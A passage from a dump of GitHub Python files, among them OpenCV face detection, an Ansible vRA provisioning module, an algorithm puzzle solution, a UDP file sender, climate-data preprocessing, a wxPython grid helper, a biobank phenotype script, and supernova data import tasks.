status_list[-1]==0 and status_list[-2]==1:\r\n times.append(datetime.now())\r\n\r\n\r\n\r\n cv2.imshow(\"Gray Frame\",gray)\r\n cv2.imshow(\"Delta Frame\",delta_frame)\r\n cv2.imshow(\"Threshold Frame\",thresh_frame)\r\n cv2.imshow(\"Color Frame\",frame)\r\n\r\n faces = face_cascade.detectMultiScale(gray)\r\n print(faces)\r\n if len(faces) == 0:\r\n print (\"No faces found\")\r\n\r\n else:\r\n print(faces)\r\n print(faces.shape)\r\n print (\"Number of faces detected: \" + str(faces.shape[0]))\r\n\r\n for (x,y,w,h) in faces:\r\n cv2.rectangle(image,(x,y),(x+w,y+h),(0,255,0),1)\r\n\r\n cv2.rectangle(image, ((0,image.shape[0] -25)),(800, image.shape[0]), (255,255,255), -1)\r\n cv2.putText(image, \"Number of faces detected: \" + str(faces.shape[0]), (0,image.shape[0] -10), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (0,0,0), 1)\r\n\r\n cv2.imshow('Image with faces',image)\r\n cv2.waitKey(0)\r\n\r\n key=cv2.waitKey(1)\r\n\r\n if key==ord('q'):\r\n if status==1:\r\n times.append(datetime.now())\r\n break\r\n\r\n\r\n\r\nprint(status_list)\r\nprint(times)\r\nfor i in range(0,len(times),2):\r\n df=df.append({\"Start\":times[i],\"End\":times[i+1]},ignore_index=True)\r\n\r\ndf.to_csv(\"Times.csv\")\r\n\r\nvideo.release()\r\ncv2.destroyAllWindows\r\n","repo_name":"divyadharshinichinnan/crowd-management-","sub_path":"count/people.py","file_name":"people.py","file_ext":"py","file_size_in_byte":2425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"9510551494","text":" #!/usr/bin/python\n\nSOCKET_TIMEOUT = 30\nDEFAULT_TENANT = 'vsphere.local'\nDEFAULT_MEMORY = 512\nDEFAULT_CPUS = 1\n\nANSIBLE_METADATA = {\n 'metadata_version': '1.1',\n 'status': ['preview'],\n 'supported_by': 'community'\n}\n\nDOCUMENTATION = '''\n---\nmodule: vravm\nshort_description: A module that wraps the vRA 7 REST calls.\nversion_added: \"2.4\"\ndescription:\n - This module provides a wrapper for making vRA API REST calls to a specific\n vRA instance.\noptions:\n host:\n description:\n - This is vRA host name.\n required: true\n rest_method:\n description:\n - The name of the REST method to call on the host.\n required: true\n username:\n description:\n - The user name to use when logging into the vRA instance to\n retrieve a bearer token.\n required: false\n password:\n description:\n - The password for the user logging into the vRA instance to\n retrieve a bearer token.\n required: false\n vm_template:\n description:\n - The JSON blueprint template object that acts as the configuration\n for the VM to be provisioned.\n required: false\n tenant:\n description:\n - The tenant for the user making the REST call. This will default\n to \"vsphere.local\".\n required: false\n token:\n description:\n - The bearer token to use with all calls other than the one to\n retrieve the bearer token.\n required: false\n catalog_item_id:\n description:\n - The ID of the catalog item that is to be the target of the method\n execution.\n required: false\nauthor:\n - Todd Blackwell (@vmware.com)\n'''\n\nEXAMPLES = '''\n# Retrieve a bearer token\n- name: Get a Bearer Token\n vra7rest:\n host: vra-01a.corp.local\n rest_method: get_bearer_token\n username: jason\n password: VMware1!\n tenant: vsphere.local\n'''\n\nRETURN = '''\noriginal_message:\n description: The original name param that was passed in\n type: str\nmessage:\n description: The output message that the sample module generates\n'''\n\nimport json\n\nfrom ansible.module_utils.basic import AnsibleModule\nfrom ansible.module_utils.urls import fetch_url, url_argument_spec\n\ndef set_json_value(json, path_list, new_value):\n\n if len(path_list) > 1:\n outer_most_path_element = path_list.pop(0)\n sub_json_object = json[outer_most_path_element]\n set_json_value(sub_json_object, path_list, new_value)\n else:\n json[path_list[0]] = new_value\n\ndef main():\n # Define the parameters that a user can pass into this module.\n module_args = dict(\n host=dict(type='str', required=True),\n username=dict(type='str', required=True),\n password=dict(type='str', required=True, no_log=True),\n tenant=dict(type='str', required=False, default=DEFAULT_TENANT),\n blueprint_name=dict(type='str', required=False),\n memory=dict(type='str', required=False, default=DEFAULT_MEMORY),\n cpu_count=dict(type='str', required=False, default=DEFAULT_CPUS),\n number_of_instances=dict(type='str', required=False, default='1'),\n wait_for_vm=dict(type='str', required=False, default=False),\n validate_certs=dict(type='str', required=False)\n )\n\n body_format = 'json'\n body = ''\n body_json = {}\n output = {'headers': '',\n 'url': '',\n 'bearer_token': '',\n 'catalog_items': {},\n 'blueprint_catalog_item_id': '',\n 'blueprint_item': {},\n 'blueprint_template': {},\n 'response': {}}\n\n # seed the result dict in the object\n # we primarily care about changed and state\n # change is if this module effectively modified the target\n # state will include any data that you want your module to pass back\n # for consumption, for example, in a subsequent task\n result = dict(\n result_text='',\n output=''\n )\n\n # the AnsibleModule object will be our abstraction working with Ansible\n # this includes instantiation, a couple of common attr would be the\n # args/params passed to the execution, as well as if the module\n # supports check mode\n module = AnsibleModule(\n argument_spec=module_args,\n supports_check_mode=True\n )\n\n host = module.params['host']\n username = module.params['username']\n password = module.params['password']\n tenant = module.params['tenant']\n blueprint_name = module.params['blueprint_name']\n memory = module.params['memory']\n cpu_count = module.params['cpu_count']\n number_of_instances = module.params['number_of_instances']\n body_format = 'json'\n body = ''\n body_json = {}\n output = {'headers': '',\n 'url': '',\n 'bearer_token': '',\n 'catalog_items': {},\n 'blueprint_catalog_item_id': '',\n 'blueprint_item': {},\n 'blueprint_template': {},\n 'response': {}}\n\n #===========================================================================\n # The first step is to get the bearer token.\n #===========================================================================\n method = 'POST'\n url = 'https://' + host + '/identity/api/tokens'\n headers = {'Accept':'application/json',\n 'Content-Type':'application/json'}\n body_json = {'username': username,\n 'password': password,\n 'tenant': tenant}\n body = json.dumps(body_json)\n\n # Make the REST call to get the bearer token.\n response, info = fetch_url(module,\n url,\n data=body,\n headers=headers,\n method=method,\n timeout=SOCKET_TIMEOUT)\n\n response_content = response.read()\n response_json = json.loads(response_content)\n bearer_token = response_json[\"id\"]\n\n output['bearer_token'] = bearer_token\n\n #===========================================================================\n # Get the list of catalog items.\n #===========================================================================\n method = 'GET'\n url = 'https://' + host + '/catalog-service/api/consumer/entitledCatalogItemViews'\n headers = {'Accept':'application/json',\n 'Content-Type':'application/json',\n 'Authorization':'Bearer ' + bearer_token}\n\n # Make the request\n response, info = fetch_url(module,\n url,\n data=body,\n headers=headers,\n method=method,\n timeout=SOCKET_TIMEOUT)\n\n response_content = response.read()\n catalog_items = json.loads(response_content)['content']\n\n # Find the catalog item that matches the blueprint name passed into this\n # module.\n blueprint_item = {}\n for catalog_item in catalog_items:\n if catalog_item['name'] == blueprint_name:\n blueprint_item = catalog_item\n\n if blueprint_item:\n blueprint_catalog_item_id = blueprint_item['catalogItemId']\n\n output['blueprint_item'] = blueprint_item\n output['blueprint_catalog_item_id'] = blueprint_catalog_item_id\n else:\n raise Exception(\"Blueprint could not be found\")\n\n #===========================================================================\n # Get the blueprint template using the catalog ID.\n #===========================================================================\n method = 'GET'\n url = 'https://' + host + '/catalog-service/api/consumer/entitledCatalogItems/' + blueprint_catalog_item_id + '/requests/template'\n headers = {'Accept':'application/json',\n 'Authorization':'Bearer ' + bearer_token}\n\n # Make the request\n response, info = fetch_url(module,\n url,\n data=body,\n headers=headers,\n method=method,\n timeout=SOCKET_TIMEOUT)\n\n response_content = response.read()\n blueprint_template = json.loads(response_content)\n\n output['blueprint_template'] = blueprint_template\n\n #===========================================================================\n # Update the template with the new values supplied by the user.\n #===========================================================================\n blueprint_data_item_name = blueprint_name.replace(' ', '_')\n memory_path = 'data/' + blueprint_data_item_name + '/data/memory'\n cpus_path = 'data/' + blueprint_data_item_name + '/data/cpu'\n number_of_instances_path = 'data/_number_of_instances'\n\n memory_path_list = memory_path.split('/')\n cpus_path_list = cpus_path.split('/')\n number_of_instances_list = number_of_instances_path.split('/')\n\n set_json_value(blueprint_template, memory_path_list, memory)\n set_json_value(blueprint_template, cpus_path_list, cpu_count)\n set_json_value(blueprint_template, number_of_instances_list, number_of_instances)\n\n #===========================================================================\n # Submit the modified blueprint template to provision the VM.\n #===========================================================================\n method = 'POST'\n url = 'https://' + host + '/catalog-service/api/consumer/entitledCatalogItems/' + blueprint_catalog_item_id + '/requests'\n headers = {'Accept':'application/json',\n 'Content-Type':'application/json',\n 'Authorization':'Bearer ' + bearer_token}\n\n # Make the request\n response, info = fetch_url(module,\n url,\n data=json.dumps(blueprint_template),\n headers=headers,\n method=method,\n timeout=SOCKET_TIMEOUT)\n\n output['response'] = response\n output['url'] = url\n output['headers'] = headers\n response_content = response.read()\n blueprint_template = json.loads(response_content)\n\n # If the user is working with this module in only check mode we do not\n # want to make any changes to the environment, just return the current\n # state with no modifications\n if module.check_mode:\n return result\n\n # Use whatever logic you need to determine whether or not this module\n # made any modifications to your target\n if module.params['host']:\n result['changed'] = True\n\n # during the execution of the module, if there is an exception or a\n # conditional state that effectively causes a failure, run\n # AnsibleModule.fail_json() to pass in the message and the result\n if module.params['host'] == 'fail me':\n module.fail_json(msg='You requested this to fail', **result)\n\n #result['output'] = output\n\n # in the event of a successful module execution, you will want to\n # simple AnsibleModule.exit_json(), passing the key/value results\n module.exit_json(**result)\n\nif __name__ == '__main__':\n main()\n","repo_name":"tblackwell/ansible-vra-rest","sub_path":"modules/vravm.py","file_name":"vravm.py","file_ext":"py","file_size_in_byte":11230,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"}
+{"seq_id":"21860069898","text":"import sys\r\nfrom collections import defaultdict, deque\r\n\r\ninput = sys.stdin.readline\r\n\r\nn, m, k = map(int, input().split())\r\n\r\nground = defaultdict(deque)\r\n\r\nnutrition = [\r\n [5] * n\r\n for _ in range(n)\r\n]\r\n\r\nplus_nutrition = [\r\n list(map(int, input().split()))\r\n for _ in range(n)\r\n]\r\n\r\nfor _ in range(m):\r\n x, y, z = map(int, input().split())\r\n # 인덱스를 맞추기 위해 1씩 차감\r\n x -= 1; y -= 1\r\n \r\n # 나무 나이 삽입\r\n ground[(x, y)].append(z)\r\n \r\n# 봄 -> 나무가 자신의 위치에서 나이만큼 양분을 먹고 나이 1 증가\r\n# 그것이 안된다면 죽고, 여름에 해당 위치에 양분으로 남음\r\ndef spring_and_summer(): \r\n # key : 나무가 심어진 좌표 튜플\r\n for key in list(ground.keys()):\r\n x, y = key\r\n # 해당 좌표에 새로 기록할 나무 나이 정보\r\n temp_deque = deque()\r\n \r\n # 현재 좌표에서 죽은 나무\r\n dead_tree = 0\r\n \r\n # 나이가 어린 나무부터 양분을 먹음\r\n for tree_age in ground[key]:\r\n # 양분을 먹을 수 있는 경우 나이만큼 먹고 임시 힙에 삽입\r\n if nutrition[x][y] >= tree_age:\r\n temp_deque.append(tree_age+1) # 임시 큐에 저장\r\n nutrition[x][y] -= tree_age\r\n \r\n # 먹을 수 없다면 죽음\r\n else:\r\n dead_tree += tree_age // 2\r\n\r\n # 새로 기록한 나무 나이 저장\r\n ground[key] = temp_deque\r\n \r\n # 해당 위치에서 죽은 나무로 양분 추가\r\n nutrition[x][y] += dead_tree\r\n\r\n\r\n# 가을에는 나이가 5배수인 나무가 주변 8칸으로 번식\r\ndef autumn_and_winter():\r\n # 나무가 번식하는 주변 위치\r\n dxs = [-1, -1, -1, 0, 0, 1, 1, 1]\r\n dys = [-1, 0, 1, -1, 1, -1, 0, 1]\r\n \r\n for key in list(ground.keys()):\r\n x, y = key\r\n for tree_age in ground[key]:\r\n if tree_age % 5 != 0:\r\n continue\r\n \r\n # 주변 8칸으로 나이가 1인 나무 번식\r\n for dx, dy in zip(dxs, dys):\r\n nx, ny = x + dx, y + dy\r\n \r\n # 땅을 벗어나지 않는다면 해당 칸으로 번식\r\n if 0 <= nx < n and 0 <= ny < n:\r\n ground[(nx, ny)].appendleft(1)\r\n \r\n # 겨울에는 로봇이 땅을 돌아다니며 양분을 추가함\r\n for x in range(n):\r\n for y in range(n):\r\n nutrition[x][y] += plus_nutrition[x][y]\r\n \r\n \r\n# k년 동안 계절 사이클을 반복 후 전체 나무의 개수를 구한다.\r\nfor _ in range(k):\r\n spring_and_summer()\r\n autumn_and_winter()\r\n\r\nanswer = 0\r\nfor key in list(ground.keys()):\r\n answer += len(ground[key])\r\n \r\nprint(answer)","repo_name":"KimChanw/Python_Algorithm","sub_path":"백준/Gold/16235. 나무 재테크/나무 재테크.py","file_name":"나무 재테크.py","file_ext":"py","file_size_in_byte":2857,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"12566628400","text":"import sys\r\nimport socket\r\nimport time\r\nimport argparse\r\nfrom STPSegment import STPSegment\r\n\r\nclass Sender:\r\n def __init__(self, sender_port, receiver_port, file_to_send, max_win, rto):\r\n self.sender_port = sender_port\r\n self.receiver_port = receiver_port\r\n self.file_to_send = file_to_send\r\n self.max_win = max_win\r\n self.rto = rto\r\n\r\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n self.sock.bind(('localhost', self.sender_port))\r\n self.sock.settimeout(0.5)\r\n self.ISN = 0\r\n self.log_file = open(\"sender_log.txt\", \"w\")\r\n self.start_time = None\r\n\r\n def log(self, snd_rcv, packet_type, seq_num, num_bytes):\r\n current_time = time.time()\r\n elapsed_time = round(current_time - self.start_time, 5) if self.start_time is not None else 0\r\n pack_type = \"DATA\"\r\n\r\n if packet_type==1:\r\n pack_type = \"ACK\"\r\n elif packet_type==2:\r\n pack_type = \"SYN\"\r\n elif packet_type==3:\r\n pack_type = \"FIN\"\r\n elif packet_type==4:\r\n pack_type = \"RESET\"\r\n\r\n log_str = f\"{snd_rcv} {elapsed_time}s {pack_type} {seq_num} {num_bytes}\\n\"\r\n self.log_file.write(log_str)\r\n\r\n # DATA = 0, ACK = 1, SYN = 2, FIN = 3, RESET = 4\r\n def send_syn(self, seq_num):\r\n segment = STPSegment(seq_num=seq_num, segment_type=2)\r\n self.sock.sendto(segment.to_bytes(), ('localhost', self.receiver_port))\r\n self.log(\"snd\", 2, seq_num, 0)\r\n \r\n\r\n def send_fin(self, seq_num):\r\n segment = STPSegment(seq_num=seq_num, segment_type=3)\r\n self.sock.sendto(segment.to_bytes(), ('localhost', self.receiver_port))\r\n\r\n self.log(\"snd\", 3, seq_num, 0)\r\n\r\n def connection_establish(self):\r\n retry_count = 0\r\n self.start_time = time.time()\r\n while retry_count < 3:\r\n try:\r\n self.send_syn(self.ISN)\r\n \r\n data, _ = self.sock.recvfrom(4096)\r\n segment = STPSegment.from_bytes(data)\r\n\r\n if segment.segment_type==1:\r\n self.log(\"rcv\", 1, segment.seq_num, 0)\r\n \r\n self.ISN = self.ISN + 1\r\n return True\r\n \r\n except socket.timeout:\r\n print(\"SOCKET TIMEOUT DURING CONNECTION ESTABLISHING\")\r\n retry_count += 1\r\n \r\n return False\r\n \r\n def connection_terminate(self):\r\n retry_count = 0\r\n while retry_count < 3:\r\n try:\r\n self.send_fin(self.ISN)\r\n \r\n data, _ = self.sock.recvfrom(4096)\r\n segment = STPSegment.from_bytes(data)\r\n if segment.segment_type==1 and segment.seq_num==self.ISN + 1:\r\n self.log(\"rcv\", 1, segment.seq_num, 0)\r\n\r\n self.ISN = self.ISN + 1\r\n return True\r\n \r\n except socket.timeout:\r\n print(\"SOCKET TIMEOUT DURING CONNECTION TERMINATION\")\r\n retry_count += 1\r\n \r\n return False\r\n\r\n def send_data(self):\r\n if self.connection_establish():\r\n with open(self.file_to_send, 'rb') as file:\r\n filedata = file.read(1000)\r\n while filedata:\r\n segment = STPSegment(seq_num=self.ISN, payload=filedata, segment_type=0)\r\n self.sock.sendto(segment.to_bytes(), ('localhost', self.receiver_port))\r\n self.log(\"snd\", 0, self.ISN, len(filedata))\r\n # new seq num if the send works\r\n temp_seq = self.ISN + len(filedata)\r\n\r\n ack_received = False\r\n\r\n while not ack_received:\r\n try:\r\n data, _ = self.sock.recvfrom(4096)\r\n segment = STPSegment.from_bytes(data)\r\n self.log(\"rcv\", 1, segment.seq_num, 0)\r\n\r\n if segment.seq_num >= temp_seq:\r\n # The seq number in the ack matches or is ahead of the one we are about to send out\r\n ack_received = True\r\n self.ISN = segment.seq_num\r\n temp_seq = segment.seq_num\r\n else:\r\n # oh our dat wasnt lost their ack was lost so now they're ahead of us\r\n pass\r\n \r\n except socket.timeout:\r\n # Didnt receive an ack so we can only assume our sent data was lost so resend\r\n segment = STPSegment(seq_num=self.ISN, payload=filedata, segment_type=0)\r\n self.sock.sendto(segment.to_bytes(), ('localhost', self.receiver_port))\r\n self.log(\"snd\", 0, self.ISN, len(filedata))\r\n\r\n self.ISN = temp_seq\r\n time.sleep(0.05)\r\n filedata = file.read(1000)\r\n \r\n # Send the end of transmission segment with FIN flag\r\n if self.connection_terminate():\r\n print(\"COMPLETE PROGRAM\")\r\n \r\n\r\ndef main():\r\n parser = argparse.ArgumentParser(description='Sender')\r\n parser.add_argument('sender_port', type=int, help='Sender port number')\r\n parser.add_argument('receiver_port', type=int, help='Receiver port number')\r\n parser.add_argument('file_to_send', type=str, help='File to send')\r\n parser.add_argument('max_win', type=int, help='Max Window Size in bytes')\r\n parser.add_argument('rto', type=str, help='Retransmission time')\r\n args = parser.parse_args()\r\n\r\n sender = Sender(args.sender_port, args.receiver_port, args.file_to_send, args.max_win, args.rto)\r\n sender.send_data()\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"mira-moonbeam/simpleSTPwithSlidingWindow","sub_path":"Sender.py","file_name":"Sender.py","file_ext":"py","file_size_in_byte":6007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"9094876651","text":"import numpy as np\nimport xarray as xr\nfrom datetime import datetime \nfrom datetime import timedelta\nfrom datetime import date\nimport time\n\nimport numpy as np\nimport xarray as xr\nfrom datetime import datetime \nfrom datetime import timedelta\nfrom datetime import date\nimport time\n\nimport pandas as pd\n\ndef sel_train_data_lead(nc_in_file,target_len,\n s_target_date,e_target_date,\n rw_1,lead_time,rw,ntimestep):\n '''\n This function inputs a 2-D file.nc, reads it as a xarray and creates\n a predictor array. 1_D:time, 2_D:features\n \n The length of the target time series must be given (target_len).\n The start date and end date that we want to predict must be given \n (e.g., s_target_date='16-10-1980', e_target_date='16-12-2021') and\n the running window that was already applied on the predictors with center=False must be\n declared (rw_1). \n \n The predictor is selected in a way so that the \n needed date is predicted at a certain lead time (lead_time) and for a specific running\n window that was applied on the target with center=True (rw). If center=False, then set rw=0.\n Moreover, a selected time step for the LSTM \n is considered (ntimestep).\n '''\n \n print('starting')\n\n SDD = int(s_target_date[0:2])\n SMM = int(s_target_date[3:5])\n SYY=int(s_target_date[6:10])\n print('start target date',SDD,SMM,SYY)\n\n EDD = int(e_target_date[0:2])\n EMM = int(e_target_date[3:5])\n EYY = int(e_target_date[6:10])\n print('end target',EDD,EMM,EYY)\n\n half_rw = int(rw/2)\n \n # Create correctly formated datetime\n date_target = datetime.strftime(datetime(year=SYY,month=SMM,day=SDD), \"%Y.%m.%d\")\n \n # Initialize shape of the final predictor array\n \n pc_predictor = [] # np.ndarray((target_len,ntimestep,int(nc_in_file[var_name].shape[1])))\n time_list = []\n it = 0\n ii = 0\n YYY = SYY\n while YYY < EYY+1:\n if YYY not in [2005,2007,2018,2004,2006]:\n date_start = datetime.strftime(datetime.strptime(date_target, \"%Y.%m.%d\")- timedelta(days=half_rw+lead_time+rw_1+ntimestep-1),\"%Y.%m.%d\")\n date_end = datetime.strftime(datetime.strptime(date_target, \"%Y.%m.%d\")- timedelta(days=half_rw+lead_time+rw_1),\"%Y.%m.%d\")\n #print(date_target,date_start,date_end,it)\n f = nc_in_file.sel(time = slice(date_start,date_end))\n f=f.assign_coords(time=range(ntimestep))\n time_list.append(date_target)\n pc_predictor.append(f)\n if date_target == datetime.strftime(datetime(year=YYY,month=EMM,day=EDD),\"%Y.%m.%d\"):\n YYY = YYY+1\n date_target = datetime.strftime(datetime(year=YYY,month=SMM,day=SDD), \"%Y.%m.%d\")\n it = 0\n #print(YYY)\n else:\n it = 1\n ii = ii+1\n date_target = datetime.strftime(datetime.strptime(date_target, \"%Y.%m.%d\")+timedelta(days=it),\"%Y.%m.%d\") \n pc_predictor = xr.concat(pc_predictor,\"new_time\").rename({\"time\":\"lag\"}).rename({\"new_time\":\"time\"})\n pc_predictor = pc_predictor.assign_coords(time=time_list)\n pc_predictor = pc_predictor.assign_coords(time=pd.DatetimeIndex(pc_predictor.time)) #-pd.Timedelta(\"15 d\"))\n #print('pc_predictor_shape',pc_predictor.shape)\n return pc_predictor\n ","repo_name":"ZhengWinnieWu/Lorentz_workshop","sub_path":"L_functions.py","file_name":"L_functions.py","file_ext":"py","file_size_in_byte":3321,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"}
+{"seq_id":"35352813903","text":"def XYToCell(self, x, y):\n # For virtual grids, XYToCell doesn't work properly\n # For some reason, the width and heights of the labels\n # are not computed properly and thw row and column\n # returned are computed as if the window wasn't\n # scrolled\n # This function replaces XYToCell for Virtual Grids\n\n rowwidth = self.GetGridRowLabelWindow().GetRect().width\n colheight = self.GetGridColLabelWindow().GetRect().height\n yunit, xunit = self.GetScrollPixelsPerUnit()\n xoff = self.GetScrollPos(wxHORIZONTAL) * xunit\n yoff = self.GetScrollPos(wxVERTICAL) * yunit\n\n # the solution is to offset the x and y values\n # by the width and height of the label windows\n # and then adjust by the scroll position\n # Then just go through the columns and rows\n # incrementing by the current column and row sizes\n # until the offset points lie within the computed\n # bounding boxes.\n x += xoff - rowwidth\n xpos = 0\n for col in range(self.GetNumberCols()):\n nextx = xpos + self.GetColSize(col) \n if xpos <= x <= nextx:\n break\n xpos = nextx\n\n y += yoff - colheight\n ypos = 0\n for row in range(self.GetNumberRows()):\n nexty = ypos + self.GetRowSize(row)\n if ypos <= y <= nexty:\n break\n ypos = nexty\n\n return row, col\n\n \t \t \n","repo_name":"wxWidgets/trac-attachments","sub_path":"ticket/45c/45ce120feaa2c1a2bb53db6c8fb833e58d6bb661/7c3dd4f6fb82b99043a8469a03b13ed7d8561bc9.py","file_name":"7c3dd4f6fb82b99043a8469a03b13ed7d8561bc9.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"37137386899","text":"import argparse\nparser = argparse.ArgumentParser(prog='subset_pheno_covar_by_indiv.py', description='''\n Input1: pheno_covar table obtained from ukbREST along with post-QCs\n Input2: YAML file defining which columns are phenotypes and covariates\n Input3: a list of individual ID\n Output: the phenotype and covariate for the subset of individuals\n''')\n\nparser.add_argument('--pheno-covar-csv', required=True, help='''\n Phenotype table obtained from ukbREST \n''')\nparser.add_argument('--pheno-covar-yaml', required=True, help='''\n YAML file telling which columns are phenotype and covariates\n''')\nparser.add_argument('--indiv-list', required=True, help='''\n The list of individuals (it can have several columns but the first one \n will be treated as individual ID)\n''')\nparser.add_argument('--output-pheno', required=True, help='''\n Phenotype table for subset individuals\n''')\nparser.add_argument('--output-covar', required=True, help='''\n Covariate table for subset individuals\n''')\nparser.add_argument('--indiv-colname', default='eid', help='''\n Column name of individual ID in input\n''')\n\nargs = parser.parse_args()\n\nimport pandas as pd\nimport numpy as np\nimport h5py\nimport logging, os, time, sys\nimport my_hail_helper as hail_helper\nimport gwas_helper\n\n\n# configing util\nlogging.basicConfig(\n level = logging.INFO, \n stream = sys.stderr, \n format = '%(asctime)s %(message)s',\n datefmt = '%Y-%m-%d %I:%M:%S %p'\n)\n\n# load phenotypes and covariates (Exactly the same as gwas_build_pheno_and_covar.py)\nlogging.info('Start loading phenotypes and covariates (the full table)')\npheno_covar_dic = gwas_helper.read_yaml(args.pheno_covar_yaml)\ncovar_names = pheno_covar_dic['covar_names'] # 'age_recruitment,sex,pc1,pc2'\npheno_names = pheno_covar_dic['pheno_names'] # 'ht,mcv,mch'\nindiv_id = pheno_covar_dic['indiv_id'] # 'eid'\nint_names = pheno_covar_dic['int_names'] # 'age_recruitment,sex'\nstr_names = pheno_covar_dic['str_names'] # 'eid'\nlogging.info('--> Read in CSV file as data.frame')\ntstart = time.time()\ncovar, trait = hail_helper.read_and_split_phenotype_csv(\n args.pheno_covar_csv,\n pheno_names = pheno_names,\n covar_names = covar_names,\n indiv_id = indiv_id,\n int_names = int_names,\n str_names = str_names\n)\ntend = time.time()\nlogging.info('--> Read in CSV file as data.frame FINISHED! {} seconds elapsed'.format(tend - tstart))\n\n# read individual list\nlogging.info('Read individual list')\nindiv_list = hail_helper.read_indiv_list(args.indiv_list)\n\n# subsetting\ntrait_sub = hail_helper.subset_by_col(trait, args.indiv_colname, indiv_list)\ncovar_sub = hail_helper.subset_by_col(covar, args.indiv_colname, indiv_list)\n\n# save as TSV\ntrait_sub.to_csv(args.output_pheno, header = True, index = None, sep = '\\t')\ncovar_sub.to_csv(args.output_covar, header = True, index = None, sep = '\\t')\n","repo_name":"liangyy/ptrs-ukb","sub_path":"code/subset_pheno_covar_by_indiv.py","file_name":"subset_pheno_covar_by_indiv.py","file_ext":"py","file_size_in_byte":2859,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"40644057541","text":"'''Import tasks for the Supernova Legacy Survey.\n'''\nimport csv\nimport os\nfrom glob import glob\nfrom math import log10\n\nfrom astrocats.catalog.utils import (get_sig_digits, pbar, pbar_strings,\n pretty_num)\nfrom astropy.time import Time as astrotime\nfrom astroquery.vizier import Vizier\n\nfrom ..supernova import SUPERNOVA\n\n\ndef do_snls_photo(catalog):\n task_str = catalog.get_current_task_str()\n snls_path = os.path.join(catalog.get_current_task_repo(), 'SNLS-ugriz.dat')\n data = list(csv.reader(open(snls_path, 'r'), delimiter=' ',\n quotechar='\"', skipinitialspace=True))\n for row in pbar(data, task_str):\n flux = row[3]\n err = row[4]\n # Being extra strict here with the flux constraint, see note below.\n if float(flux) < 3.0 * float(err):\n continue\n name = 'SNLS-' + row[0]\n name = catalog.add_entry(name)\n source = catalog.entries[name].add_source(\n bibcode='2010A&A...523A...7G')\n catalog.entries[name].add_quantity(SUPERNOVA.ALIAS, name, source)\n band = row[1]\n mjd = row[2]\n sig = get_sig_digits(flux.split('E')[0]) + 1\n # Conversion comes from SNLS-Readme\n # NOTE: Datafiles avail for download suggest diff zeropoints than 30,\n # need to inquire.\n magnitude = pretty_num(30.0 - 2.5 * log10(float(flux)), sig=sig)\n e_mag = pretty_num(\n 2.5 * log10(1.0 + float(err) / float(flux)), sig=sig)\n # e_mag = pretty_num(2.5*(log10(float(flux) + float(err)) -\n # log10(float(flux))), sig=sig)\n catalog.entries[name].add_photometry(\n time=mjd, band=band, magnitude=magnitude, e_magnitude=e_mag,\n counts=flux, e_counts=err, source=source)\n\n catalog.journal_entries()\n return\n\n\ndef do_snls_spectra(catalog):\n \"\"\"\n \"\"\"\n\n task_str = catalog.get_current_task_str()\n result = Vizier.get_catalogs('J/A+A/507/85/table1')\n table = result[list(result.keys())[0]]\n table.convert_bytestring_to_unicode(python3_only=True)\n datedict = {}\n for row in table:\n datedict['SNLS-' + row['SN']] = str(astrotime(row['Date']).mjd)\n\n oldname = ''\n file_names = glob(os.path.join(catalog.get_current_task_repo(), 'SNLS/*'))\n for fi, fname in enumerate(pbar_strings(file_names, task_str)):\n filename = os.path.basename(fname)\n fileparts = filename.split('_')\n name = 'SNLS-' + fileparts[1]\n name = catalog.get_preferred_name(name)\n if oldname and name != oldname:\n catalog.journal_entries()\n oldname = name\n name = catalog.add_entry(name)\n source = catalog.entries[name].add_source(\n bibcode='2009A&A...507...85B')\n catalog.entries[name].add_quantity(SUPERNOVA.ALIAS, name, source)\n\n catalog.entries[name].add_quantity(\n SUPERNOVA.DISCOVER_DATE, '20' + fileparts[1][:2], source)\n\n f = open(fname, 'r')\n data = csv.reader(f, delimiter=' ', skipinitialspace=True)\n specdata = []\n for r, row in enumerate(data):\n if row[0] == '@TELESCOPE':\n telescope = row[1].strip()\n elif row[0] == '@REDSHIFT':\n catalog.entries[name].add_quantity(\n SUPERNOVA.REDSHIFT, row[1].strip(), source)\n if r < 14:\n continue\n specdata.append(list(filter(None, [x.strip(' \\t') for x in row])))\n specdata = [list(i) for i in zip(*specdata)]\n wavelengths = specdata[1]\n\n fluxes = [pretty_num(float(x) * 1.e-16, sig=get_sig_digits(x))\n for x in specdata[2]]\n # FIX: this isnt being used\n # errors = [pretty_num(float(x)*1.e-16, sig=get_sig_digits(x)) for x in\n # specdata[3]]\n\n catalog.entries[name].add_spectrum(\n u_wavelengths='Angstrom', u_fluxes='erg/s/cm^2/Angstrom',\n wavelengths=wavelengths,\n fluxes=fluxes, u_time='MJD' if name in datedict else '',\n time=datedict[name] if name in datedict else '',\n telescope=telescope, source=source,\n filename=filename)\n if catalog.args.travis and fi >= catalog.TRAVIS_QUERY_LIMIT:\n break\n catalog.journal_entries()\n return\n","repo_name":"finzellt/novae","sub_path":"tasks/snls.py","file_name":"snls.py","file_ext":"py","file_size_in_byte":4309,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"}
